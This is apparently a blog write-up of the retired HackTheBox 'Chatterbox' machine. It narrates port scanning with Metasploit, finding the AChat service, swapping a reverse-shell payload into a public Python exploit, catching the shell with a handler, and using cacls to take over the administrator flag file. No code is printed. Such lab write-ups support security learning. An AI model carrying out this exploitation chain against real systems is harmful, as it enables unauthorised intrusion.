Hi everyone, I’m come back for the hackthebox writing moment ;) I was waiting for the retired machine ;)
Today we are talking about the machine calls chatterbox. It’s a machine to chat with people. There is a chat software on the machine of the challenge.
Without any delay, let’s go to the goal ;)
Enumeration
We are going to get more information about our target ;) I’ve changed my way for the beginning : use metasploit instead of nmap ;) Why ? ’cause I didn’t found open doors with it !
I used this module : “ portscan/tcp” then I configured it as below :
Let’s run it to see the results after a long time !
Ok, we also have only 2 ports ( doors open) in TCP. With these information we are gonna dig more ;)
- Port 9255
Let’s investigate on port 9255 to see what is it behind
2. Port 9256
Let’s investigate on port 9256 to see what is it behind
Nope’s interesting except that a software is communicate with these port ! That’s the weakness hahah ;)
More enumeration
Ok, with hackthebox there is often an hidden sens ;) I dug more and found that there is AChat system behind the system.
Here is the public exploit that you can read to understand in deep. It’s written in Python.
Exploitation
After reading in deep we can see that the shellcode is customise by the hacker and what he wanna do.
So, we are going to change the shellcode with a reverse shell and feel the IP target with the remote port. So, let’s do it.
I’ve used the shellcode above to get a reverse shell.
Ok, let’s configure our handler on Metasploit. It’s also possible with Netcat.
Enter the payload that I put on the exploit.py “ windows/shell_reverse_tcp” then the LPORT 4444 and the ip of the target.
With this in place, let’s run all them in this sequence.
- Run the exploit.py
- Run the handler on Metasploit
BTW, we are in, that’s cool.
Post exploitation
This is the last step in this challenge. At first let’s catch the user flag.
Some tricky command on Windows to see the OS with patch ;)
Ok, we’ve got now the user flag. Let’s dig to find the ultime flag, the administrator flag.
Let’s try catch it !
At this step we can’t catch it ! OMG ;) Let’s bypass
To bypass the rights, I used cacls command and changed the right to get the flag.
For more info, I invite you to read the documentation of the command to understand the bypass.